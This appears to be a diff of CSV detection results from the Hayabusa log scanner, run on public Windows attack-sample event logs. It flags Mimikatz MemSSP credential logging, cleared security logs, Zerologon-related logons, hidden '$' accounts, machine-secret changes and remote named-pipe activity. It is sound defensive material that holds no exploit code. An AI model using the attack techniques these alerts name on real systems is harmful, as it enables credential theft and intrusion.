+2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,,Logon Failure - Wrong Password,User: IEUser | Type: 2 | Computer: MSEDGEWIN10 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
+2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-66F7-5F5A-0500-00000000F600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
+2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
+2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 640 | PGUID: 747F3D96-672C-5F5B-0D00-00000000FC00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx
+2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx
+2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
+2020-09-14 23:44:14.393 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
+2020-09-14 23:46:33.690 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
+2020-09-14 23:48:28.683 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
+2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
+2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: svc01 | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\inetsrv\w3wp.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
+2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,Evas,System Log File Cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx
+2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
+2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
+2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
+2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
+2020-09-21 06:22:24.799 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Local Admin Password Setting Changed | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F4\ForcePasswordReset: Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-C6C1-5F67-0000-0010A65D0000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon_13_Local_Admin_Password_Changed.evtx
+2020-09-24 01:49:26.469 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52246 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 3276 | PGUID: 83989F29-7CA8-5F6B-1201-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 7096 | PGUID: 83989F29-7CA8-5F6B-1301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.703 +09:00,01566s-win16-ir.threebeesco.com,18,medium,,Pipe Connected_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | LID: 0x3e5 | PID: 6868 | PGUID: 83989F29-7CC8-5F6B-2101-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50106 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50107 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\wermgr.exe -upload | Process: C:\Windows\System32\wermgr.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 4248 | PGUID: 83989F29-7CCB-5F6B-2301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:27.599 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52249 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:45.506 +09:00,01566s-win16-ir.threebeesco.com,17,medium,,Pipe Created_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: C:\Windows\System32\svchost.exe | PID: 6924 | PGUID: 83989F29-7CC9-5F6B-2201-000000000301,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:51:27.552 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52264 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-27 22:19:54.244 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.250 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.257 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.264 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.272 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\atsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.286 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.293 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\eventlog | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.299 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\InitShutdown | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.314 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.322 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\LSM_API_service | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.328 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.343 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.350 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ROUTER | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.364 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\scerpc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.371 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.377 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\tapsrv | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.385 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\trkwks | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.399 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:20:11.245 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:20:11.247 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:42:00.726 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:00.969 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
